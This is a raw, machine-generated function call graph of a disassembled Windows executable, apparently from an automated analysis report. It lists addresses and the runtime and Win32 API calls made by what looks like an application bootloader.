7ff6fabe1242 79802->79803 79803->79760 80012 7ff6fabe1db0 80 API calls 79804->80012 79807 7ff6fabe129f 79805->79807 79815 7ff6fabe12bb memcpy_s 79805->79815 80013 7ff6fabe1db0 80 API calls 79807->80013 79809 7ff6fabee794 _fread_nolock 53 API calls 79809->79815 79810 7ff6fabee508 37 API calls 79810->79815 79811 7ff6fabe1288 __vcrt_freefls 79811->79760 79812 7ff6fabe137f 79813 7ff6fabe1df0 81 API calls 79812->79813 79813->79811 79815->79809 79815->79810 79815->79811 79815->79812 80014 7ff6fabeeed4 76 API calls 79815->80014 79817 7ff6fabee474 79816->79817 80015 7ff6fabee220 79817->80015 79819 7ff6fabee48d 79819->79758 79820->79760 79821->79760 80027 7ff6fabee7b4 79822->80027 79825->79760 79827 7ff6fabe7822 MultiByteToWideChar 79826->79827 79828 7ff6fabe7846 79826->79828 79827->79828 79830 7ff6fabe785c __vcrt_freefls 79827->79830 79829 7ff6fabe7863 MultiByteToWideChar 79828->79829 79828->79830 79829->79830 79830->79787 79832 7ff6fabf5ce8 79831->79832 79833 7ff6fabf5d0e 79832->79833 79836 7ff6fabf5d41 79832->79836 79862 7ff6fabfb108 11 API calls _get_daylight 79833->79862 79835 7ff6fabf5d13 79863 7ff6fabfa4a4 37 API calls _invalid_parameter_noinfo 79835->79863 79838 7ff6fabf5d54 79836->79838 79839 7ff6fabf5d47 79836->79839 79850 7ff6fabfa7b0 79838->79850 79864 7ff6fabfb108 11 API calls _get_daylight 79839->79864 79840 7ff6fabe31f6 79840->79792 79844 7ff6fabf5d75 79857 7ff6fabffdcc 79844->79857 79845 7ff6fabf5d68 79865 7ff6fabfb108 11 API calls _get_daylight 79845->79865 79848 7ff6fabf5d88 79866 7ff6fabf4f88 LeaveCriticalSection 79848->79866 79867 7ff6fac001d8 EnterCriticalSection 79850->79867 79852 7ff6fabfa7c7 79853 7ff6fabfa824 19 API calls 79852->79853 79854 7ff6fabfa7d2 79853->79854 79855 7ff6fac00238 _isindst LeaveCriticalSection 79854->79855 79856 7ff6fabf5d5e 79855->79856 79856->79844 79856->79845 79868 7ff6fabffac8 79857->79868 79860 7ff6fabffe26 79860->79848 79862->79835 79863->79840 79864->79840 79865->79840 79869 7ff6fabffb03 __vcrt_InitializeCriticalSectionEx 79868->79869 79878 7ff6fabffcca 79869->79878 79883 7ff6fac06154 51 API calls 3 library calls 79869->79883 79871 7ff6fabffda1 79887 7ff6fabfa4a4 37 API calls _invalid_parameter_noinfo 79871->79887 79873 7ff6fabffcd3 79873->79860 79880 7ff6fac06e3c 79873->79880 79875 7ff6fabffd35 79875->79878 79884 7ff6fac06154 51 API calls 3 library calls 79875->79884 79877 7ff6fabffd54 79877->79878 79885 7ff6fac06154 51 API calls 3 library calls 79877->79885 79878->79873 79886 7ff6fabfb108 11 API calls _get_daylight 79878->79886 79888 7ff6fac0643c 79880->79888 79883->79875 79884->79877 79885->79878 79886->79871 79887->79873 79889 7ff6fac06453 79888->79889 79890 7ff6fac06471 79888->79890 79942 7ff6fabfb108 11 API calls _get_daylight 79889->79942 79890->79889 79893 7ff6fac0648d 79890->79893 79892 7ff6fac06458 79943 7ff6fabfa4a4 37 API calls _invalid_parameter_noinfo 79892->79943 79899 7ff6fac06a4c 79893->79899 79896 7ff6fac06464 79896->79860 79945 7ff6fac06780 79899->79945 79902 7ff6fac06ac1 79977 7ff6fabfb0e8 11 API calls _get_daylight 79902->79977 79903 7ff6fac06ad9 79965 7ff6fabf80d4 79903->79965 79906 7ff6fac06ac6 79978 7ff6fabfb108 11 API calls _get_daylight 79906->79978 79934 7ff6fac064b8 79934->79896 79944 7ff6fabf80ac LeaveCriticalSection 79934->79944 79942->79892 79943->79896 79946 7ff6fac067ac 79945->79946 79954 7ff6fac067c6 79945->79954 79946->79954 79990 7ff6fabfb108 11 API calls _get_daylight 79946->79990 79948 7ff6fac067bb 79991 7ff6fabfa4a4 37 API calls _invalid_parameter_noinfo 79948->79991 79950 7ff6fac06895 79963 7ff6fac068f2 79950->79963 79996 7ff6fabf9730 37 API calls 2 library calls 79950->79996 79951 7ff6fac06844 79951->79950 79994 7ff6fabfb108 11 API calls _get_daylight 79951->79994 79954->79951 79992 7ff6fabfb108 11 API calls _get_daylight 79954->79992 79955 7ff6fac068ee 79958 7ff6fac06970 79955->79958 79955->79963 79956 7ff6fac0688a 79995 7ff6fabfa4a4 37 API calls _invalid_parameter_noinfo 79956->79995 79997 7ff6fabfa4c4 17 API calls _isindst 79958->79997 79960 7ff6fac06839 79993 7ff6fabfa4a4 37 API calls _invalid_parameter_noinfo 79960->79993 79963->79902 79963->79903 79998 7ff6fac001d8 EnterCriticalSection 79965->79998 79977->79906 79978->79934 79990->79948 79991->79954 79992->79960 79993->79951 79994->79956 79995->79950 79996->79955 80000 7ff6fabee8c6 79999->80000 80001 7ff6fabee886 79999->80001 80000->80001 80003 7ff6fabee8d2 80000->80003 80011 7ff6fabfa3d8 37 API calls 2 library calls 80001->80011 80010 7ff6fabf4f7c EnterCriticalSection 80003->80010 80005 7ff6fabee8ad 80005->79797 80006 7ff6fabee8d7 80007 7ff6fabee9e0 71 API calls 80006->80007 80008 7ff6fabee8e9 80007->80008 80009 7ff6fabf4f88 _fread_nolock LeaveCriticalSection 80008->80009 80009->80005 80011->80005 80012->79811 80013->79811 80014->79815 80016 7ff6fabee23b 80015->80016 80017 7ff6fabee269 80015->80017 80026 7ff6fabfa3d8 37 API calls 2 library calls 80016->80026 80024 7ff6fabee25b 80017->80024 80025 7ff6fabf4f7c EnterCriticalSection 80017->80025 80020 7ff6fabee280 80021 7ff6fabee29c 72 API calls 80020->80021 80022 7ff6fabee28c 80021->80022 80023 7ff6fabf4f88 _fread_nolock LeaveCriticalSection 80022->80023 80023->80024 80024->79819 80026->80024 80028 7ff6fabee7de 80027->80028 80029 7ff6fabee7ac 80027->80029 80028->80029 80030 7ff6fabee7ed memcpy_s 80028->80030 80031 7ff6fabee82a 80028->80031 80029->79762 80041 7ff6fabfb108 11 API calls _get_daylight 80030->80041 80040 7ff6fabf4f7c EnterCriticalSection 80031->80040 80034 7ff6fabee832 80035 7ff6fabee534 _fread_nolock 51 API calls 80034->80035 80037 7ff6fabee849 80035->80037 80036 7ff6fabee802 80042 7ff6fabfa4a4 37 API calls _invalid_parameter_noinfo 80036->80042 80039 7ff6fabf4f88 _fread_nolock LeaveCriticalSection 80037->80039 80039->80029 80041->80036 80042->80029 80046 7ff6fabf47be 80043->80046 80044 7ff6fabf47e3 80061 7ff6fabfa3d8 37 API calls 2 library calls 80044->80061 80045 7ff6fabf481f 80062 7ff6fabf1658 49 API calls _invalid_parameter_noinfo 80045->80062 80046->80044 80046->80045 80049 7ff6fabf480d 80050 7ff6fabea9b0 _log10_special 8 API calls 80049->80050 80053 7ff6fabe1c18 80050->80053 80051 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 80051->80049 80052 7ff6fabf48b6 80054 7ff6fabf4920 80052->80054 80055 7ff6fabf48d1 80052->80055 80058 7ff6fabf48c8 80052->80058 80059 7ff6fabf48fc 80052->80059 80053->79735 80056 7ff6fabf492a 80054->80056 80054->80059 80063 7ff6fabfa0e4 80055->80063 80060 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 80056->80060 80058->80055 80058->80059 80059->80051 80060->80049 80061->80049 80062->80052 80064 7ff6fabfa118 80063->80064 80065 7ff6fabfa0e9 RtlFreeHeap 80063->80065 80064->80049 80065->80064 80066 7ff6fabfa104 GetLastError 80065->80066 80067 7ff6fabfa111 Concurrency::details::SchedulerProxy::DeleteThis 80066->80067 80069 7ff6fabfb108 11 API calls _get_daylight 80067->80069 80069->80064 80071 7ff6fabe1d86 80070->80071 80087 7ff6fabf4640 80071->80087 80073 7ff6fabe1d9c 80074 7ff6fabe1c30 80073->80074 80075 7ff6fabe1c40 80074->80075 80076 7ff6fabf4764 49 API calls 80075->80076 80077 7ff6fabe1c88 80076->80077 80078 7ff6fabe7800 2 API calls 80077->80078 80079 7ff6fabe1ca0 80078->80079 80080 7ff6fabe1caa 80079->80080 80081 7ff6fabe1cc8 80079->80081 80082 7ff6fabe1d60 78 API calls 80080->80082 80103 7ff6fabe1d10 78 API calls 80081->80103 80084 7ff6fabe1cc6 80082->80084 80085 7ff6fabea9b0 _log10_special 8 API calls 80084->80085 80086 7ff6fabe1cf1 80085->80086 80086->79738 80088 7ff6fabf466a 80087->80088 80089 7ff6fabf46a2 80088->80089 80091 7ff6fabf46d5 80088->80091 80101 7ff6fabfa3d8 37 API calls 2 library calls 80089->80101 80094 7ff6fabeef78 80091->80094 80092 7ff6fabf46cb 80092->80073 80102 7ff6fabf4f7c EnterCriticalSection 80094->80102 80096 7ff6fabeef95 80097 7ff6fabf1018 76 API calls 80096->80097 80098 7ff6fabeef9e 80097->80098 80099 7ff6fabf4f88 _fread_nolock LeaveCriticalSection 80098->80099 80100 7ff6fabeefa8 80099->80100 80100->80092 80101->80092 80103->80084 80104->79781 80106 7ff6fabeb09c 80127 7ff6fabeb27c 80106->80127 80109 7ff6fabeb1f3 80263 7ff6fabeb59c 7 API calls 2 library calls 80109->80263 80110 7ff6fabeb0bd __scrt_acquire_startup_lock 80112 7ff6fabeb1fd 80110->80112 80118 7ff6fabeb0db __scrt_release_startup_lock 80110->80118 80264 7ff6fabeb59c 7 API calls 2 library calls 80112->80264 80114 7ff6fabeb100 80115 7ff6fabeb208 __CxxCallCatchBlock 80116 7ff6fabeb186 80135 7ff6fabf9338 80116->80135 80118->80114 80118->80116 80260 7ff6fabf96e4 45 API calls 80118->80260 80120 7ff6fabeb18b 80141 7ff6fabe1000 80120->80141 80124 7ff6fabeb1af 80124->80115 80262 7ff6fabeb400 7 API calls 80124->80262 80126 7ff6fabeb1c6 80126->80114 80128 7ff6fabeb284 80127->80128 80129 7ff6fabeb290 __scrt_dllmain_crt_thread_attach 80128->80129 80130 7ff6fabeb29d 80129->80130 80133 7ff6fabeb0b5 80129->80133 80265 7ff6fabf9f8c 80130->80265 80133->80109 80133->80110 80136 7ff6fabf9348 80135->80136 80138 7ff6fabf935d 80135->80138 80136->80138 80282 7ff6fabf8dc8 40 API calls Concurrency::details::SchedulerProxy::DeleteThis 80136->80282 80138->80120 80139 7ff6fabf9366 80139->80138 80283 7ff6fabf9188 12 API calls 3 library calls 80139->80283 80142 7ff6fabe26b0 80141->80142 80284 7ff6fabf5220 80142->80284 80144 7ff6fabe26eb 80291 7ff6fabe25a0 80144->80291 80149 7ff6fabea9b0 _log10_special 8 API calls 80152 7ff6fabe2a6e 80149->80152 80150 7ff6fabe272c 80153 7ff6fabe1bd0 49 API calls 80150->80153 80151 7ff6fabe2836 80154 7ff6fabe31a0 108 API calls 80151->80154 80261 7ff6fabeb6ec GetModuleHandleW 80152->80261 80177 7ff6fabe2748 80153->80177 80155 7ff6fabe2846 80154->80155 80156 7ff6fabe2885 80155->80156 80379 7ff6fabe6870 80155->80379 80160 7ff6fabe1df0 81 API calls 80156->80160 80158 7ff6fabe2994 80388 7ff6fabe7440 GetConsoleWindow GetCurrentProcessId GetWindowThreadProcessId ShowWindow 80158->80388 80159 7ff6fabe299b 80164 7ff6fabe29a4 80159->80164 80165 7ff6fabe299f 80159->80165 80161 7ff6fabe26f8 80160->80161 80161->80149 80162 7ff6fabe2878 80168 7ff6fabe289f 80162->80168 80169 7ff6fabe287d 80162->80169 80353 7ff6fabe7040 80164->80353 80389 7ff6fabe75b0 GetConsoleWindow GetCurrentProcessId GetWindowThreadProcessId ShowWindow 80165->80389 80171 7ff6fabe1bd0 49 API calls 80168->80171 80173 7ff6fabee444 74 API calls 80169->80173 80170 7ff6fabe2999 80170->80164 80174 7ff6fabe28be 80171->80174 80172 7ff6fabe29b0 __vcrt_freefls 80175 7ff6fabe2ab3 80172->80175 80176 7ff6fabe29f2 80172->80176 80173->80156 80180 7ff6fabe18d0 114 API calls 80174->80180 80393 7ff6fabe30c0 49 API calls 80175->80393 80179 7ff6fabe7040 14 API calls 80176->80179 80177->80158 80177->80159 80182 7ff6fabe29fe 80179->80182 80183 7ff6fabe28df 80180->80183 80181 7ff6fabe2ac1 80184 7ff6fabe2ad4 80181->80184 80185 7ff6fabe2ae0 80181->80185 80390 7ff6fabe71b0 40 API calls __vcrt_freefls 80182->80390 80183->80177 80187 7ff6fabe28ef 80183->80187 80394 7ff6fabe3210 80184->80394 80189 7ff6fabe1bd0 49 API calls 80185->80189 80191 7ff6fabe1df0 81 API calls 80187->80191 80192 7ff6fabe2a39 __vcrt_freefls 80189->80192 80190 7ff6fabe2a0d 80193 7ff6fabe2a84 80190->80193 80196 7ff6fabe2a17 80190->80196 80191->80161 80194 7ff6fabe7800 2 API calls 80192->80194 80200 7ff6fabe2a40 80192->80200 80391 7ff6fabe7490 87 API calls _log10_special 80193->80391 80198 7ff6fabe2b0d 80194->80198 80197 7ff6fabe1bd0 49 API calls 80196->80197 80197->80192 80198->80200 80201 7ff6fabe2b1e SetDllDirectoryW 80198->80201 80199 7ff6fabe2a89 80199->80200 80202 7ff6fabe2a9e 80199->80202 80207 7ff6fabe1df0 81 API calls 80200->80207 80203 7ff6fabe2b32 80201->80203 80392 7ff6fabe6e70 112 API calls 2 library calls 80202->80392 80205 7ff6fabe2c95 80203->80205 80397 7ff6fabe57b0 80 API calls 80203->80397 80211 7ff6fabe2ca0 80205->80211 80212 7ff6fabe2ca7 80205->80212 80206 7ff6fabe2aa6 80206->80192 80209 7ff6fabe2aaa 80206->80209 80207->80161 80209->80200 80210 7ff6fabe2b44 80398 7ff6fabe5d20 113 API calls 2 library calls 80210->80398 80405 7ff6fabe7440 GetConsoleWindow GetCurrentProcessId GetWindowThreadProcessId ShowWindow 80211->80405 80214 7ff6fabe2cb0 80212->80214 80215 7ff6fabe2cab 80212->80215 80366 7ff6fabe2240 80214->80366 80406 7ff6fabe75b0 GetConsoleWindow GetCurrentProcessId GetWindowThreadProcessId ShowWindow 80215->80406 80217 7ff6fabe2ca5 80217->80214 80219 7ff6fabe2b59 80220 7ff6fabe2bb6 80219->80220 80222 7ff6fabe2b70 80219->80222 80399 7ff6fabe57f0 116 API calls _log10_special 80219->80399 80220->80205 80227 7ff6fabe2bcb 80220->80227 80234 7ff6fabe2b74 80222->80234 80400 7ff6fabe5b90 115 API calls 80222->80400 80403 7ff6fabe22a0 117 API calls 2 library calls 80227->80403 80228 7ff6fabe2b85 80228->80234 80401 7ff6fabe5ef0 82 API calls 80228->80401 80233 7ff6fabe2bd3 80233->80161 80237 7ff6fabe2bdb 80233->80237 80234->80220 80235 7ff6fabe1df0 81 API calls 80234->80235 80239 7ff6fabe2bae 80235->80239 80236 7ff6fabe2cd6 80404 7ff6fabe7420 LocalFree 80237->80404 80402 7ff6fabe59d0 FreeLibrary 80239->80402 80260->80116 80261->80124 80262->80126 80263->80112 80264->80115 80266 7ff6fac032ac 80265->80266 80267 7ff6fabeb2a2 80266->80267 80270 7ff6fabfc1a0 80266->80270 80267->80133 80269 7ff6fabebcb8 7 API calls 2 library calls 80267->80269 80269->80133 80281 7ff6fac001d8 EnterCriticalSection 80270->80281 80272 7ff6fabfc1b0 80273 7ff6fabf7f1c 43 API calls 80272->80273 80274 7ff6fabfc1b9 80273->80274 80275 7ff6fabfc1c7 80274->80275 80276 7ff6fabfbf9c 45 API calls 80274->80276 80277 7ff6fac00238 _isindst LeaveCriticalSection 80275->80277 80279 7ff6fabfc1c2 80276->80279 80278 7ff6fabfc1d3 80277->80278 80278->80266 80280 7ff6fabfc08c GetStdHandle GetFileType 80279->80280 80280->80275 80282->80139 80283->80138 80287 7ff6fabff380 80284->80287 80285 7ff6fabff3d3 80408 7ff6fabfa3d8 37 API calls 2 library calls 80285->80408 80287->80285 80289 7ff6fabff426 80287->80289 80288 7ff6fabff3fc 80288->80144 80409 7ff6fabff258 71 API calls _fread_nolock 80289->80409 80410 7ff6fabeacb0 80291->80410 80294 7ff6fabe25db 80417 7ff6fabe1ed0 80 API calls 80294->80417 80295 7ff6fabe25f8 80412 7ff6fabe76f0 FindFirstFileExW 80295->80412 80299 7ff6fabe2665 80420 7ff6fabe78b0 WideCharToMultiByte WideCharToMultiByte __vcrt_freefls 80299->80420 80300 7ff6fabe260b 80418 7ff6fabe7770 CreateFileW GetFinalPathNameByHandleW CloseHandle 80300->80418 80302 7ff6fabea9b0 _log10_special 8 API calls 80305 7ff6fabe269d 80302->80305 80304 7ff6fabe2673 80312 7ff6fabe25ee 80304->80312 80421 7ff6fabe1e50 78 API calls 80304->80421 80305->80161 80313 7ff6fabe18d0 80305->80313 80306 7ff6fabe2618 80307 7ff6fabe2634 __vcrt_InitializeCriticalSectionEx 80306->80307 80308 7ff6fabe261c 80306->80308 80307->80299 80419 7ff6fabe1e50 78 API calls 80308->80419 80311 7ff6fabe262d 80311->80312 80312->80302 80314 7ff6fabe31a0 108 API calls 80313->80314 80315 7ff6fabe1905 80314->80315 80316 7ff6fabe1b96 80315->80316 80318 7ff6fabe6870 83 API calls 80315->80318 80317 7ff6fabea9b0 _log10_special 8 API calls 80316->80317 80320 7ff6fabe1bb1 80317->80320 80319 7ff6fabe194b 80318->80319 80321 7ff6fabeeacc 73 API calls 80319->80321 80352 7ff6fabe197c 80319->80352 80320->80150 80320->80151 80323 7ff6fabe1965 80321->80323 80322 7ff6fabee444 74 API calls 80322->80316 80324 7ff6fabe1981 80323->80324 80325 7ff6fabe1969 80323->80325 80327 7ff6fabee794 _fread_nolock 53 API calls 80324->80327 80422 7ff6fabe1db0 80 API calls 80325->80422 80328 7ff6fabe1999 80327->80328 80329 7ff6fabe199f 80328->80329 80330 7ff6fabe19b7 80328->80330 80423 7ff6fabe1db0 80 API calls 80329->80423 80332 7ff6fabe19ce 80330->80332 80333 7ff6fabe19e6 80330->80333 80424 7ff6fabe1db0 80 API calls 80332->80424 80335 7ff6fabe1bd0 49 API calls 80333->80335 80336 7ff6fabe19fd 80335->80336 80337 7ff6fabe1bd0 49 API calls 80336->80337 80338 7ff6fabe1a48 80337->80338 80339 7ff6fabeeacc 73 API calls 80338->80339 80340 7ff6fabe1a6c 80339->80340 80341 7ff6fabe1a81 80340->80341 80342 7ff6fabe1a99 80340->80342 80425 7ff6fabe1db0 80 API calls 80341->80425 80343 7ff6fabee794 _fread_nolock 53 API calls 80342->80343 80345 7ff6fabe1aae 80343->80345 80346 7ff6fabe1ab4 80345->80346 80347 7ff6fabe1acc 80345->80347 80426 7ff6fabe1db0 80 API calls 80346->80426 80427 7ff6fabee508 37 API calls 2 library calls 80347->80427 80350 7ff6fabe1ae6 80351 7ff6fabe1df0 81 API calls 80350->80351 80350->80352 80351->80352 80352->80322 80354 7ff6fabe704a 80353->80354 80355 7ff6fabe7800 2 API calls 80354->80355 80356 7ff6fabe7069 GetEnvironmentVariableW 80355->80356 80357 7ff6fabe70d2 80356->80357 80358 7ff6fabe7086 ExpandEnvironmentStringsW 80356->80358 80359 7ff6fabea9b0 _log10_special 8 API calls 80357->80359 80358->80357 80360 7ff6fabe70a8 80358->80360 80362 7ff6fabe70e4 80359->80362 80428 7ff6fabe78b0 WideCharToMultiByte WideCharToMultiByte __vcrt_freefls 80360->80428 80362->80172 80363 7ff6fabe70ba 80364 7ff6fabea9b0 _log10_special 8 API calls 80363->80364 80365 7ff6fabe70ca 80364->80365 80365->80172 80429 7ff6fabe4d50 80366->80429 80370 7ff6fabe2261 80374 7ff6fabe2279 80370->80374 80499 7ff6fabe4a60 80370->80499 80372 7ff6fabe226d 80372->80374 80508 7ff6fabe4bf0 81 API calls 80372->80508 80375 7ff6fabe2560 80374->80375 80376 7ff6fabe256e 80375->80376 80377 7ff6fabe257f 80376->80377 80558 7ff6fabe73b0 FreeLibrary 80376->80558 80407 7ff6fabe59d0 FreeLibrary 80377->80407 80380 7ff6fabe6894 80379->80380 80381 7ff6fabe696b __vcrt_freefls 80380->80381 80382 7ff6fabeeacc 73 API calls 80380->80382 80381->80162 80383 7ff6fabe68b0 80382->80383 80383->80381 80559 7ff6fabf7664 80383->80559 80385 7ff6fabe68c5 80385->80381 80386 7ff6fabeeacc 73 API calls 80385->80386 80387 7ff6fabee794 _fread_nolock 53 API calls 80385->80387 80386->80385 80387->80385 80388->80170 80389->80164 80390->80190 80391->80199 80392->80206 80393->80181 80395 7ff6fabe1bd0 49 API calls 80394->80395 80396 7ff6fabe3240 80395->80396 80396->80192 80397->80210 80398->80219 80399->80222 80400->80228 80401->80234 80402->80220 80403->80233 80405->80217 80406->80214 80407->80236 80408->80288 80409->80288 80411 7ff6fabe25ac GetModuleFileNameW 80410->80411 80411->80294 80411->80295 80413 7ff6fabe772f FindClose 80412->80413 80414 7ff6fabe7742 80412->80414 80413->80414 80415 7ff6fabea9b0 _log10_special 8 API calls 80414->80415 80416 7ff6fabe2602 80415->80416 80416->80299 80416->80300 80417->80312 80418->80306 80419->80311 80420->80304 80421->80312 80422->80352 80423->80352 80424->80352 80425->80352 80426->80352 80427->80350 80428->80363 80430 7ff6fabe4d65 80429->80430 80431 7ff6fabe1bd0 49 API calls 80430->80431 80432 7ff6fabe4da1 80431->80432 80433 7ff6fabe4daa 80432->80433 80434 7ff6fabe4dcd 80432->80434 80435 7ff6fabe1df0 81 API calls 80433->80435 80436 7ff6fabe3210 49 API calls 80434->80436 80453 7ff6fabe4dc3 80435->80453 80437 7ff6fabe4de5 80436->80437 80438 7ff6fabe4e03 80437->80438 80439 7ff6fabe1df0 81 API calls 80437->80439 80509 7ff6fabe3140 80438->80509 80439->80438 80441 7ff6fabea9b0 _log10_special 8 API calls 80443 7ff6fabe224e 80441->80443 80443->80374 80460 7ff6fabe4ee0 80443->80460 80444 7ff6fabe4e1b 80446 7ff6fabe3210 49 API calls 80444->80446 80445 7ff6fabe73d0 3 API calls 80445->80444 80447 7ff6fabe4e34 80446->80447 80448 7ff6fabe4e59 80447->80448 80449 7ff6fabe4e39 80447->80449 80515 7ff6fabe73d0 80448->80515 80450 7ff6fabe1df0 81 API calls 80449->80450 80450->80453 80452 7ff6fabe4e66 80454 7ff6fabe4e72 80452->80454 80455 7ff6fabe4ea9 80452->80455 80453->80441 80456 7ff6fabe7800 2 API calls 80454->80456 80520 7ff6fabe42e0 124 API calls 80455->80520 80458 7ff6fabe4e8a 80456->80458 80519 7ff6fabe1ed0 80 API calls 80458->80519 80521 7ff6fabe3eb0 80460->80521 80462 7ff6fabe4f1a 80463 7ff6fabe4f33 80462->80463 80464 7ff6fabe4f22 80462->80464 80528 7ff6fabe3680 80463->80528 80465 7ff6fabe1df0 81 API calls 80464->80465 80471 7ff6fabe4f2e 80465->80471 80468 7ff6fabe4f3f 80470 7ff6fabe1df0 81 API calls 80468->80470 80469 7ff6fabe4f50 80472 7ff6fabe4f5f 80469->80472 80473 7ff6fabe4f70 80469->80473 80470->80471 80471->80370 80474 7ff6fabe1df0 81 API calls 80472->80474 80532 7ff6fabe3930 80473->80532 80474->80471 80476 7ff6fabe4f8b 80477 7ff6fabe4f8f 80476->80477 80478 7ff6fabe4fa0 80476->80478 80479 7ff6fabe1df0 81 API calls 80477->80479 80480 7ff6fabe4faf 80478->80480 80481 7ff6fabe4fc0 80478->80481 80479->80471 80482 7ff6fabe1df0 81 API calls 80480->80482 80539 7ff6fabe37d0 80481->80539 80482->80471 80485 7ff6fabe4fcf 80487 7ff6fabe1df0 81 API calls 80485->80487 80486 7ff6fabe4fe0 80488 7ff6fabe4fef 80486->80488 80489 7ff6fabe5000 80486->80489 80487->80471 80490 7ff6fabe1df0 81 API calls 80488->80490 80491 7ff6fabe5011 80489->80491 80493 7ff6fabe5022 80489->80493 80490->80471 80492 7ff6fabe1df0 81 API calls 80491->80492 80492->80471 80496 7ff6fabe504c 80493->80496 80553 7ff6fabf704c 73 API calls 80493->80553 80495 7ff6fabe503a 80554 7ff6fabf704c 73 API calls 80495->80554 80496->80471 80497 7ff6fabe1df0 81 API calls 80496->80497 80497->80471 80500 7ff6fabe4a80 80499->80500 80500->80500 80501 7ff6fabe4aa9 80500->80501 80505 7ff6fabe4ac0 __vcrt_freefls 80500->80505 80502 7ff6fabe1df0 81 API calls 80501->80502 80503 7ff6fabe4ab5 80502->80503 80503->80372 80504 7ff6fabe1420 113 API calls 80504->80505 80505->80504 80506 7ff6fabe1df0 81 API calls 80505->80506 80507 7ff6fabe4bcb 80505->80507 80506->80505 80507->80372 80508->80374 80510 7ff6fabe314a 80509->80510 80511 7ff6fabe7800 2 API calls 80510->80511 80512 7ff6fabe316f 80511->80512 80513 7ff6fabea9b0 _log10_special 8 API calls 80512->80513 80514 7ff6fabe3197 80513->80514 80514->80444 80514->80445 80516 7ff6fabe7800 2 API calls 80515->80516 80517 7ff6fabe73e4 LoadLibraryExW 80516->80517 80518 7ff6fabe7403 __vcrt_freefls 80517->80518 80518->80452 80519->80453 80520->80453 80522 7ff6fabe3edc 80521->80522 80523 7ff6fabe3ee4 80522->80523 80524 7ff6fabe4084 80522->80524 80555 7ff6fabf68c4 48 API calls 80522->80555 80523->80462 80525 7ff6fabe4247 __vcrt_freefls 80524->80525 80526 7ff6fabe33b0 47 API calls 80524->80526 80525->80462 80526->80524 80529 7ff6fabe36b0 80528->80529 80530 7ff6fabea9b0 _log10_special 8 API calls 80529->80530 80531 7ff6fabe371a 80530->80531 80531->80468 80531->80469 80533 7ff6fabe399f 80532->80533 80535 7ff6fabe394b 80532->80535 80557 7ff6fabe3530 MultiByteToWideChar MultiByteToWideChar __vcrt_freefls 80533->80557 80538 7ff6fabe398a 80535->80538 80556 7ff6fabe3530 MultiByteToWideChar MultiByteToWideChar __vcrt_freefls 80535->80556 80536 7ff6fabe39ac 80536->80476 80538->80476 80540 7ff6fabe37e5 80539->80540 80541 7ff6fabe1bd0 49 API calls 80540->80541 80542 7ff6fabe3831 80541->80542 80543 7ff6fabe38b7 __vcrt_freefls 80542->80543 80544 7ff6fabe1bd0 49 API calls 80542->80544 80546 7ff6fabea9b0 _log10_special 8 API calls 80543->80546 80545 7ff6fabe3870 80544->80545 80545->80543 80548 7ff6fabe7800 2 API calls 80545->80548 80547 7ff6fabe390c 80546->80547 80547->80485 80547->80486 80549 7ff6fabe388a 80548->80549 80550 7ff6fabe7800 2 API calls 80549->80550 80551 7ff6fabe38a1 80550->80551 80552 7ff6fabe7800 2 API calls 80551->80552 80552->80543 80553->80495 80554->80496 80555->80522 80556->80538 80557->80536 80558->80377 80560 7ff6fabf7694 80559->80560 80563 7ff6fabf7170 80560->80563 80562 7ff6fabf76ad 80562->80385 80564 7ff6fabf71ba 80563->80564 80565 7ff6fabf718b 80563->80565 80573 7ff6fabf4f7c EnterCriticalSection 80564->80573 80574 7ff6fabfa3d8 37 API calls 2 library calls 80565->80574 80568 7ff6fabf71bf 80569 7ff6fabf71dc 38 API calls 80568->80569 80570 7ff6fabf71cb 80569->80570 80571 7ff6fabf4f88 _fread_nolock LeaveCriticalSection 80570->80571 80572 7ff6fabf71ab 80571->80572 80572->80562 80574->80572 80575 7ffd935bffe0 80576 7ffd935bfff0 80575->80576 80577 7ffd935c0000 80576->80577 80581 7ffd935a14bf 80576->80581 80585 7ffd935a1e01 80576->80585 80589 7ffd935fec4c 80576->80589 80581->80577 80582 7ffd935fe560 80581->80582 80583 7ffd935fed9f SetLastError 80582->80583 80584 7ffd935fedb3 80582->80584 80583->80584 80584->80577 80585->80577 80586 7ffd935fe680 80585->80586 80587 7ffd935fed9f SetLastError 80586->80587 80588 7ffd935fedb3 80586->80588 80587->80588 80588->80577 80590 7ffd935fed60 80589->80590 80591 7ffd935fed9f SetLastError 80590->80591 80592 7ffd935fedb3 80590->80592 80591->80592 80592->80577 80593 7ffd9dfc8962 80594 7ffd9dfc898a 80593->80594 80595 7ffd9dfc8998 80593->80595 80596 7ffd9dfc8a36 80595->80596 80599 7ffd9dfc8a49 80595->80599 80600 7ffd9dfc4080 80595->80600 80596->80599 80604 7ffd9dfd1660 80596->80604 80602 7ffd9dfc4101 80600->80602 80601 7ffd9dfc449e 80601->80596 80602->80601 80603 7ffd9dfc4470 00007FFD8F8595C0 80602->80603 80603->80601 80603->80602 80605 7ffd9dfd1679 80604->80605 80623 7ffd9dfd168e 80605->80623 80626 7ffd9dfc38b0 00007FFDB2245630 00007FFDB2245630 00007FFDB2245630 80605->80626 80607 7ffd9dfd1822 80607->80623 80627 7ffd9dfc38b0 00007FFDB2245630 00007FFDB2245630 00007FFDB2245630 80607->80627 80609 7ffd9dfd195e 80609->80623 80628 7ffd9dfc38b0 00007FFDB2245630 00007FFDB2245630 00007FFDB2245630 80609->80628 80611 7ffd9dfd1af8 80611->80623 80629 7ffd9dfc38b0 00007FFDB2245630 00007FFDB2245630 00007FFDB2245630 80611->80629 80613 7ffd9dfd1c73 80613->80623 80630 7ffd9dfc38b0 00007FFDB2245630 00007FFDB2245630 00007FFDB2245630 80613->80630 80615 7ffd9dfd1dee 80615->80623 80631 7ffd9dfc38b0 00007FFDB2245630 00007FFDB2245630 00007FFDB2245630 80615->80631 80617 7ffd9dfd1f70 80617->80623 80632 7ffd9dfc38b0 00007FFDB2245630 00007FFDB2245630 00007FFDB2245630 80617->80632 80619 7ffd9dfd20f2 80619->80623 80633 7ffd9dfc38b0 00007FFDB2245630 00007FFDB2245630 00007FFDB2245630 80619->80633 80621 7ffd9dfd22bc 80621->80623 80634 7ffd9dfc38b0 00007FFDB2245630 00007FFDB2245630 00007FFDB2245630 80621->80634 80623->80599 80624 7ffd9dfd2437 80624->80623 80635 7ffd9dfc38b0 00007FFDB2245630 00007FFDB2245630 00007FFDB2245630 80624->80635 80626->80607 80627->80609 80628->80611 80629->80613 80630->80615 80631->80617 80632->80619 80633->80621 80634->80624 80635->80623 